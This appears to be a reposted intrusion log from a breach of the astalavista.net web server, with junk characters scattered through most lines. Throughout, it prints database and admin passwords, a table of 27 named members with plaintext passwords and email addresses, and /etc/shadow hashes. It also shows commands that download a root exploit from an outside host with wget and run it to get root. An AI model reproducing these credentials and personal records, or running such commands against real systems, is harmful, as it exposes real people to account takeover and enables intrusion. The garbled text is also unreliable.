+ W# a' G: w5 rdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config
, R v4 g5 W" N) Hdrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron
$ Q8 K* b- J7 U0 _) u$ _. k" I/ ydrwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd
( q% B3 B4 {- w-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php
4 G/ b7 ~9 k5 M3 F+ b. s) l-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico* u6 T9 q( f) Z2 R! h) @
drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed
3 f% O, C/ ~/ f7 T# T: V0 vdrwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour
! a' M+ d/ c% P$ P- N+ k& P: \, W-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess
+ ~3 p! L% q5 L" a+ ]- Q-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess
, T. u* E* f5 _0 K& s* K( i: r3 u-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php
+ P* {; Z4 t; e. i8 b4 B3 K/ G# `# ~-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html
' K `# d: T+ u2 m; |& h-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php
& H u: H9 C" v8 F-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php
1 J$ M, k* s4 _0 w q% x-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf
1 D7 p# u" J# x5 e" {5 n& Ndrwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc: \6 W. D/ G( Q, k+ }9 l
drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang" e' z3 r$ N1 z& m
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib# u" A- X5 Z0 S6 j6 g! F
drwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log
# {' a% t# q; `! Odrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member
& n1 V/ i, g+ A, Ydrwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata: p+ B. B( g. f. r0 `
drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new
- x7 k' V( q' T M# x-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf9 w; `, m+ m# S5 b
drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re
6 e5 c7 W( M# U; M9 [-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt% T% B, L% ~# n6 F
drwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss
8 E0 q! Z5 b4 \/ z, odrwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources
' X, g+ ?$ a( D. D: c' Udrwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com6 \3 ~$ Y Z6 A$ E$ |4 f2 Z' R
drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes; t: n4 U& H6 ~6 h! P2 t m# J
drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src/ t/ k( o, Y- [8 C. _1 i
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl6 L1 s2 X! K! V) H, z
drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2
3 T9 }3 W; f( B/ p7 }0 V- Fdrwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old
/ T) J/ Y4 N- Z/ r' p; R" M- K9 g: {-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php$ r6 ]" d$ c3 S8 [
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki
/ k: y! d: j1 x
- @+ ^" W4 X, O8 Gsh-3.2$ head -20 index.php
# H% f' M, z3 t8 `6 H& |<?PHP0 O% Y Z, L9 s- G. |9 U0 `- d
/**
* V3 n2 M. H8 a9 B) n- V* Mainfile (external) for astalavistaNET v2.01 y& u% p# s0 W4 J
*6 x4 K, v& m- D) [
* @copyright Astalavista IT Engineering GmbH
7 d. L. L8 v) ~0 L$ p# K. u* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>. G7 q0 ~+ t( f2 w' Y% L- C& y
* @version 1.0% y% F& q& q; }* O7 z, s/ h: ?
*/* N! I4 L0 }$ k. A" _8 e y
1 @2 t9 y i. _5 `* V if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {
, N4 d1 v3 _2 N" v. l* I $dontStartSession = false;
2 g( C" M5 K3 e' e; ?% N$ F4 U } else {
: _& ~; _, x' l c y" K $dontStartSession = true;
8 k6 j- X3 C( S5 t# D' m+ l }
+ e4 g0 T9 u0 w# w; i require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);- W5 D4 R7 }0 {# U
require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);
1 z! v' W" e% p require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);
. o' a! z) M- x' K9 K& o require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);
+ g9 k! G+ r, }. E8 _
: \% I) O8 ~* t8 \8 csh-3.2$ cd config/ ]2 |7 Y+ N# U
sh-3.2$ ls -la# i' F3 C1 J9 L. z3 u# Y/ i
total 32' @ g6 u3 B4 o0 E5 n
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .
6 B* c' F5 V! n5 Edrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..' C# L$ V3 E8 `
-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php
) o/ {8 X3 R, d4 b9 [-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php$ ^1 p/ @$ E1 @ l; ]
-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php5 X& P- q8 }* ]% b2 ]' c# W
-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php
9 \2 w2 {" Y9 J4 w* R-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php
0 M8 {/ l2 k1 H J( n7 W
" ]4 r! y9 N. I# r, N; s: {sh-3.2$ cat com.conf.php
/ n, f7 a" Q6 \/ x[snip]
' |# i# }, _! K) u2 ~2 i" J//member-database! U$ ^- _) A5 y" Y' \$ R6 j
$_CONFIG['db_mem_server'] = ‘localhost’;
/ z+ T3 A9 x9 `+ t F/ V$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;. v9 J# z! W2 l3 J! \ m8 k
$_CONFIG['db_mem_user'] = ‘astanet_db’;
! u" s. N8 s) w# i$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;4 w6 O( D" S/ Z; }: W! ?8 M
$_CONFIG['db_mem_debug'] = false; //true or false' e1 N- e( s+ O7 g- P
//ads-database8 W% p7 Q6 U ]2 r
$_CONFIG['db_ads_server'] = ‘localhost’;- L& [! s& Y5 }. `
$_CONFIG['db_ads_database'] = ‘astanet_ads’;: ?3 i$ a+ q4 J# C9 t+ Q" H
$_CONFIG['db_ads_user'] = ‘astanet_db’;
) s- v5 D$ [" ^ d$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;
% [7 Z9 m# ?7 k6 O$_CONFIG['db_ads_debug'] = false; //true or false
. C, B0 N3 p% R) s; W//rainbow-database& e; C. B; c2 [8 s1 x* o6 R5 A& n
$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;2 G& q. G6 J1 s$ Q- @
$_CONFIG['db_rainbow_database'] = ‘rainbow’;2 S _0 }# S: K; g' H( s& D B
$_CONFIG['db_rainbow_user'] = ‘dinu’;1 |1 [6 r" c) \4 V! p% k {
$_CONFIG['db_rainbow_password'] = ‘dinudinu’;
3 x. `9 ~: h; |3 Y0 D- G6 E) ^6 Z$_CONFIG['db_rainbow_debug'] = false; //true or false
! e) |1 ]( B/ s//mailing lists database
4 k8 @ z9 |% e$ U6 _+ D$_CONFIG['db_mailing_lists_server'] = ‘localhost’;
2 c7 v) k! N1 i- s8 y" u$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;
% O7 C5 W2 d! e, S' z$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;
% p- _7 H9 o0 b) j$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;2 g2 N8 y& |3 F0 m: j& ]% {
$_CONFIG['db_mailing_lists_debug'] = false; //true or false [/ }4 u% ^! H9 Z5 v( [% E" q# z
//paypal
* p' O: K9 \& H7 Y: B. I( I% f$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;
" W2 z( q/ I3 f& b. J% A$_CONFIG['sub_pp_cmd'] = ‘_xclick’;9 L. J9 o$ f* Y1 A, L7 ?! F. A9 K
$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;
1 l. o8 K3 D; K$ K' y: l$ A$_CONFIG['sub_pp_noship'] = ‘1′;4 Z w) c# ~& P6 B, U& K
$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;$ K( e+ r+ g* ~# B# g
[snip]$ ~" z$ h; p6 m- m/ R$ R+ g" g
. b5 h: J6 v9 x+ A- Rsh-3.2$ cd ..
9 [6 B* y4 R1 F; J8 ash-3.2$ cd member4 J2 Q0 v+ Y$ k2 x) P. F7 T
sh-3.2$ ls -la
( F4 w$ q$ m9 m9 T# j7 Mtotal 20
0 T. M! N$ R1 C2 M7 d' v9 T+ ydrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .7 A6 U, |$ n: l5 [1 v" I) f; j
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..1 w+ V5 `2 O% {8 N0 x+ \
-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess
; `+ c7 O) E* S/ u/ w, m# W-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php$ m* O) T! a l/ L9 K
sh-3.2$ cat .htaccess
0 M8 \! Y( b! j l2 r ?3 dSecFilterEngine off
2 N( `+ o. `- b( F$ V" L8 X Q2 b* l5 B4 e$ P3 B8 ^3 u' x0 l* G
sh-3.2$ cd ..
$ j0 u& S. ^4 o) ssh-3.2$ cd cron
1 ]& ?& {% }1 R0 u0 O5 bsh-3.2$ ls -la7 m K6 P1 |; m
total 168 M; i8 s. T" f4 r6 D
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .
# x) I! _+ L/ C% W& f' ydrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..5 n. R8 x, \+ L
-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php
( F( X7 ?( E1 I5 Q, Y8 \- ~-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php* g# A; F/ c s$ L" y
-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php4 e9 y6 A: y$ R9 v7 C1 o
-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php- a: C7 J; O1 O; U0 x
-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php
8 z' b6 ]5 z& s5 j-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php) m& O( X$ n. {2 U6 T9 R
-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php& w% P4 h- [9 \! Z6 C& C' H
-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php$ c) \& K! U) S: w" F( I
-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh
9 k4 ^# D3 H; Q9 ?6 ^. O# S5 b-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
% V6 | m! Z7 k6 ?5 M5 P-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php
" _* D0 `% F% t& [* |/ q" w. M1 e-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php
; z2 ]: w! [, `) h* @-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh
* y/ ]3 k9 K5 Z-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php, x, Z+ H5 O* S% C4 M
-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php
, l$ u) u2 E A. \: L-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php
2 Z4 ~; y3 Q& {( i7 ?' U7 @) m-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php5 b' F7 o5 v, v, t
-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php
, N* E4 x* D. j# _drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email x8 K6 w* N, S z: ^
-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php
8 A( R2 `, K7 ?. c0 T7 T) l8 O-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php
5 [7 S) I! X+ F, l) [1 Z+ D
) W. y( w, G/ z& B+ ?sh-3.2$ cd ..+ [. x( ^1 {7 _' Q
sh-3.2$ cd _007
" D& G% S5 [8 qsh-3.2$ ls -la
5 m& K9 q/ N/ H+ s3 E5 b, y9 Wtotal 24
/ J- ~! }' _/ tdrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .7 O: C* o; W5 |- @$ A
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .., G& l2 l! L7 h% J$ M$ j. [
-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess
* P M) L# N, w-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php$ |4 n# R" U1 z; E
-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php: k2 F2 x) T. t8 A$ g. W3 v
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap
1 ?! D! K! c7 t1 ?# |& V
3 W+ r" d# V3 F2 l. Zsh-3.2$ cat .htaccess
& E9 t9 w) m$ m% J6 PauthType Basic
9 |8 p# L8 e: P1 dauthName Admin
) C/ k0 g6 l) n$ E; @authUserFile /home/astanet/auth/.htadm_pwd8 ^! X( `* X$ z8 W7 ?
require valid-user
7 [0 c& G: o2 ?- s/ h5 F3 W8 n
9 X h$ I/ C0 @, Y6 Ush-3.2$ cat /home/astanet/auth/.htadm_pwd8 ~8 J6 b/ t1 l6 F0 `
admin2net:CR0bl65MwhfT
. W5 E$ }5 v' |( P" U( ~5 i& ?5 x/ q* @6 t% p% b: f4 H4 S
sh-3.2$ mysql -u astanet_db -p
; j$ Q$ i, d1 T2 S1 }% c; LEnter password:3 m* r. b0 x9 I* ^" R) k' j
Welcome to the MySQL monitor. Commands end with ; or \g./ T; z2 q, X A7 [ H2 |
Your MySQL connection id is 275153
4 n8 x0 b$ y$ @6 E4 J* VServer version: 5.0.45-community-log MySQL Community Edition (GPL)5 a( i% Z" y7 Z
& V$ \1 ~; Q$ A/ D) ]Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.7 e8 {8 D" R3 g# `/ D
" Z5 W4 p3 X2 f% Q
mysql> show databases;
0 K- T' N7 E0 j3 ^; s7 a. q9 q. Z+———————–+
1 c3 D% O9 J. U' T1 i5 z. ` x V| Database |
1 E( m, F: C/ F5 y: N2 N2 h$ l+———————–+0 y* k- X$ f" m2 `
| information_schema |7 m) G c3 j! }# x: a1 H
| astanet_ads |
1 F% o# k! v/ B6 d6 x- m* @& ?: x| astanet_mailing_lists |& V! n3 g d7 e, m6 ]! S
| astanet_mediawiki |' ]9 u* }0 R( \" f- z
| astanet_membersystem |
2 r& L+ Z7 {# H, k6 E9 R| test |3 H& k8 j+ I' r0 G& S/ H2 O# ^: s
+———————–+
/ v$ K* o% F8 ?$ n5 [+ X6 rows in set (0.00 sec)+ X1 p. S; D+ X" v0 a% b( y
% c+ ~ [1 z2 Q+ T& i
mysql> use astanet_membersystem
% c$ o$ e4 X! [9 i4 l! UDatabase changed9 C% F- \9 E/ i% I+ }. z9 x5 s. M
mysql> show tables;! t+ d8 l y- v1 r/ A
+———————————–+. ?0 ]' ~ {7 V) P+ W) v/ ?% q
| Tables_in_astanet_membersystem |
) d/ `. ^4 K& S" i: n3 o+———————————–+
N+ r* I. C0 H% W9 _2 ]| blacklist_categories |
) D% D5 S' k& h* R" N# T" A| blacklist_content |
5 M& ^0 Q8 U' [6 Y/ g| blacklist_levels |
! A9 H- ?( R5 m& b/ `8 A; d1 f| blacklist_mcset |9 f/ c: G( U3 |7 I; i3 v) @' h; Q1 }+ u
| dir_categories |8 U+ }6 { b3 ~1 D
| dir_comments | ?% I* @7 g, y7 y
| dir_links |/ I3 _; v4 _4 H7 a/ {: n$ u9 S
| dir_temp |) E& U4 \, V# i( A" p7 B9 u
| dir_votes |
+ c1 g L1 C) d9 X9 M+ O' @* L| documents |
& y; w! f$ N- c5 ~3 r| documents_categories |
2 h+ t& b% a: a/ {3 Y' T+ z| email_content |% K/ O- @/ l+ J+ |$ N0 X
| email_settings |
! @/ Z: t$ @! r| exploits |
' Z3 O8 ]( A j6 h' \| exploits_categories |
% O5 N6 m: h4 r1 d; m: D6 u/ w| exploittree_categories |
?1 u. u2 Y% X- D4 \9 I0 O9 \| exploittree_exploits |
6 E) \! X* w& G- ]6 k| home_values |
% v6 a" Z. \: r, u* ^| iso_countries |7 |( D: [) u& [% j/ A0 ?) ^
| links_categories |5 T2 [) i& h( Y5 |' H
| links_records |& X7 J( M, ?9 o4 x$ C+ k
| links_unauth |* [2 J! Z7 X6 N/ v3 C
| links_votes |
! X+ Y# m* C+ y4 ^| log |, ~1 }* T# H* V
| news_categories |
4 o6 L4 M$ a# j0 b| news_comments |, U* G/ B- l9 o
| news_emoticons |0 |7 V7 S S0 [$ a; i. j! }2 U- c5 O
| news_latest |
& ]* s; m. S( G/ M+ b! G. B| news_messages |3 u G: e- d% u9 P8 V" b
| news_statistics |
" H$ H9 u: R+ j. |) h/ ]| news_votes |6 b8 X, Q0 y) m4 `0 _
| prices_content |! o# n0 z8 e* ^( O' s/ s
| prices_offers |% H8 B' C1 J; Z
| rss_settings |
) T- w. [3 Y' m$ o$ v| sessions |
+ N% z" |, O! c% j9 Z| stats_signups |, g) q" I x0 o; Z# h. Q" x
| u2u2 |
* L _7 x% v8 v| u2u_contact |
7 K. r9 D; P' u" o+ `: X: z( ?) @| u2u_settings | q3 }& B& ~' r- }# I6 g
| user_keywords_selected_categories |
7 R$ J6 e: Z8 t| users |
9 X. H- ~5 g6 P( P- z| users_ipn_test |5 a s: H+ T: A5 K
| users_keyword_values |
% I. {- o6 I. | ~| users_profile |
3 T7 V- W5 G$ e! `| users_temp |
- n8 \" b5 f0 ^- `; v, M| users_upgrade |+ D: S5 d5 D, @& y& O3 I: Q4 ^
+———————————–+
3 F) B+ r5 K" G( N$ \46 rows in set (0.00 sec)# t$ E7 a0 i, n9 j7 F
+ G7 S) M" k- F6 B
mysql> describe users;
4 \& f7 V/ K" Y- f8 y% D" t3 U+————————–+————————————–+——+—–+———————+—————-+
5 e% a" r+ L% R7 w& v2 v) s| Field | Type | Null | Key | Default | Extra |! s2 U0 ?4 B+ i7 F* {: f6 m. ?0 u
+————————–+————————————–+——+—–+———————+—————-+
0 w0 y4 b% j5 f2 o- m3 g3 k- ?| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |
9 G" q6 Y1 J. D, m! _| user | varchar(50) | NO | | | |; ~$ i9 e3 H3 S6 G4 T4 `0 g
| nickname | varchar(30) | NO | MUL | anonymous | |
* q$ E6 g# F% ]) G+ O y| password | varchar(30) | NO | | | |
# z3 C4 S1 Y% J' X t3 G& g| userlevel | tinyint(3) | YES | MUL | NULL | |
- P& ^( f. H3 D) a, A4 j$ n| exp | int(8) unsigned | NO | | 0 | |
+ u) w) g( t' T/ Z5 I| email | varchar(50) | NO | | | |4 ?1 C L0 l; G( q/ Y9 V" d
| ip | varchar(15) | NO | | 0 | |
. q$ e% J6 r/ j* P% W3 E! C% m. i| proxy | set(’0′,’1′) | NO | | 0 | |
8 U: Z' p- g9 ~% ~: n& h( M7 w$ g| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |
4 ~1 A6 t# ?# o9 L$ }: Z| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |' f/ X9 c* _( ?8 T+ L) @8 |, ^
| anz_in | tinyint(1) | NO | | -1 | |# d( l- S9 B4 e+ w. }
| status | tinyint(1) unsigned | NO | | 0 | |
) A4 q' u. }$ _+ r& `| checked | set(’0′,’1′,’2′) | NO | | 0 | |2 x. n' k8 c1 \
| freemember | set(’0′,’1′) | NO | | 0 | |/ o3 @% M' E/ ^0 C% Y
| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |
. C' C; K2 u' J R* `| lang | tinytext | NO | | | |2 l5 _* D& K9 R" @0 Z
| adid | smallint(6) | NO | | 0 | |' e+ r7 B" w2 h7 i
| pp_txn_id | varchar(255) | YES | | NULL | |0 f* t4 c" e9 H! m
| cnb_transaction_id | varchar(255) | YES | | NULL | |
& E7 u. @; W6 l: p! C5 |; o| cnb_order_id | varchar(255) | YES | | NULL | |
$ }# @+ z$ a; O5 b& y6 X% F: d! U+ Z| cnb_user_id | int(11) | YES | | 0 | |
/ }) l0 {8 p6 \" N" O, A+————————–+————————————–+——+—–+———————+—————-+/ d/ a# s1 D% n3 |- g* \" I
22 rows in set (0.01 sec)
$ U9 n( J& r/ b4 }" B1 r; F7 I- }* C1 c) [( {! }. {5 P
mysql> select count(*) as skids from users;7 N( l) s5 z; _5 l9 P. i
+——-+( P g1 z8 {- L3 f1 n
| skids |# Y' I, ^# a' d( O* s
+——-+: F6 G8 t' a- C5 X
| 25199 |
1 l) H: W H- x/ i" v+——-+
4 W& O+ V+ C: Z( r* g1 row in set (0.00 sec)/ [$ D. @" s% M( T
. I9 ^ H1 z6 S9 e4 b( l# r
mysql> select user,nickname,password,email from users where userlevel = 1;
$ n" d% M* u8 X+————————–+———————-+——————+———————————–+* s' m; t. C3 }6 g5 k% o4 G
| user | nickname | password | email |" \+ Y& ?3 M9 T* w4 R8 r, H7 a
+————————–+———————-+——————+———————————–+
) v; w* X7 ?% [5 E! G| pascal | prozac | astaman3 | 链接标记info@astalavista.net |
& y1 i) B9 i# y* x. d- O; S| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |
# I! {& Q6 t* ~0 B; L| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |8 g2 i3 f4 P" q; R
| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |
$ K! e' _# n8 ^* w| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |
, V8 g7 |8 _) v" H; H| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |
. A$ n, F0 q' Y3 F# N8 s2 d+ C; l* d| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |
# Y, T) R# p: p+ }4 u| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |- g$ y- Q) Q0 K v* x( W
| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |
6 g3 |- A' m- {& B% n| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |# _) @) a: @9 L% A: h5 _& _1 p& d
| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |
) p7 J+ g" n" B; i6 O| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |5 f( v. E/ R7 @% y! z
| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com | c( `1 w3 L+ a3 e
| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |, p% i' B7 s D1 U
| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |
2 W1 K/ ?& d0 O6 \# v$ z3 o| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |
$ B, I; N5 h! s+ E| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |
( l1 z g6 ]' I, n| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |, K& j3 p' f& n* A3 E) B
| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |' c a$ g/ N0 U- J4 A
| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |$ l+ `4 K% Z6 C! I$ Q% Q) M
| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |
- n( s) \9 J7 x+ E| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |) j# s5 {$ e& F$ @
| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |+ g2 [( s2 r. o5 V$ P& G; T( N" B
| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |
5 ~2 P+ ?8 f6 E+ H| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |1 e. q$ M6 p; W4 I0 G
| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |3 z. \, o1 j9 u+ a) D: \/ f
| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |
( N: r" ^9 y% J+————————–+———————-+——————+———————————–+/ }2 J( M4 I) v
27 rows in set (0.00 sec)9 E: F8 B/ {" Z. i7 n
. f& N, }1 V; k: y9 vmysql> exit;8 u$ C* m* x% s
Bye. k1 [ }. L, w1 \( ~# o& s
3 X+ r$ r4 B: s( }" q; c! I) y[~] plaintext passwords? yes,2 S1 g8 W; Y) M( O2 E7 Q+ B$ V
Those so called “security professionals” who charge you $6.66 / month to
4 g4 `9 [& ?' ]6 w+ {! u; nregister at their hack-proof portal, save your passwords in plaintext…
1 H% V/ L8 {$ I/ z# J: V8 w/ N3 L8 Qbrilliant!; R* h+ b( z8 l, c. J) u% j% n
# E3 Y3 l+ Y8 I2 @' i[~] This been fun but we want more.
; Q) T8 }$ O9 S9 g
' }! L) B; x- U. ?) Ksh-3.2$ uname -a/ [+ ~# f# F k
Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux( C. D: @0 m R
sh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]
6 l# J1 z1 C$ h( c+ g) |) L" F–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url] P# O: K" D6 @ ^1 z8 Y( }% K
Resolving anti.sec.labs… 13.33.33.37
* I% a$ @! \* ]9 d {Connecting to anti.sec.labs|13.33.33.37|:80… connected. O7 z$ ^4 G9 e/ S
HTTP request sent, awaiting response… 200 OK
/ T5 f% [" Q6 O, k l; VLength: 18200 (18K) [text/plain]
, z+ Z6 o! C- E3 V/ BSaving to: `g0troot’- {$ X- H: d8 [8 X0 n
+ g' Y4 G4 O0 C$ ^
100%[=========================================================================================================================================>] 18,200 58.6K/s in* s/ G& M. y U, L9 u$ k1 P, ^
0.3s2 i0 h( ?: m% }' J
7 O4 Z! n" X7 f0 V+ v" e- u
18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]
2 y; K M0 c }% s; u: ?
# A z/ S+ q) \: c' T8 x, ush-3.2$ ./g0troot -i x86_64: M8 W0 H4 s( x3 P
[+] g0troot - anti.sec.labs. f6 N3 M5 Z8 K8 p/ Y& g( R
[+] Target: 2.6.18-128.1.10.el5' A2 x$ p' I. `" G
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
7 e: S, m+ Z" l+ n2 O2 b8 |& @: @) h8 u( d
[+] r00tr00t6 F6 M3 E$ Q3 {" v0 Q; u
[~] Executing shell…2 \8 r' ~, k! x C% Q
4 [! N! s# `% s: r: _/ {sh-3.2# id
" T$ s4 `# |9 g$ e* J# D* uuid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
3 n0 ? ?1 K( p/ ?# B3 H
: R4 K: R% @/ _sh-3.2# cat /etc/shadow
8 w5 w$ K8 L2 W Kroot 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
" ]1 j: y" @1 m" X! S8 i[snip]
. G8 G0 B- P2 b0 Dadmin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::& o) [( x6 T4 z; r
jon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::# p4 ^: k0 b# J: C
com1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::
w4 s4 Z @; D; q" ]% ?astanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
+ A) H+ x# ]) B9 r2 _- K1 q
6 g% n+ K! n. gsh-3.2# cat /etc/motd
+ u1 W2 f. ~% [8 e; p0 m3 Q#####################################################& U. l9 p+ `9 x
#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #
k- Y- W6 c7 Y" P P9 ?# m# |__| [__ | |__| | |__| | | | [__ | |__| # ?2 D$ d0 Q/ z
# | | ___] | | | |___ | | \/ | ___] | | | #: I# {+ f0 D. v" l: |
# #
) N" o0 l/ b, c* ]% W$ r#####################################################
0 U' b( _! a+ i5 u# #; r* o) ?5 X+ X" n( S
# Admin Contact - 链接标记support@secureservertech.com #
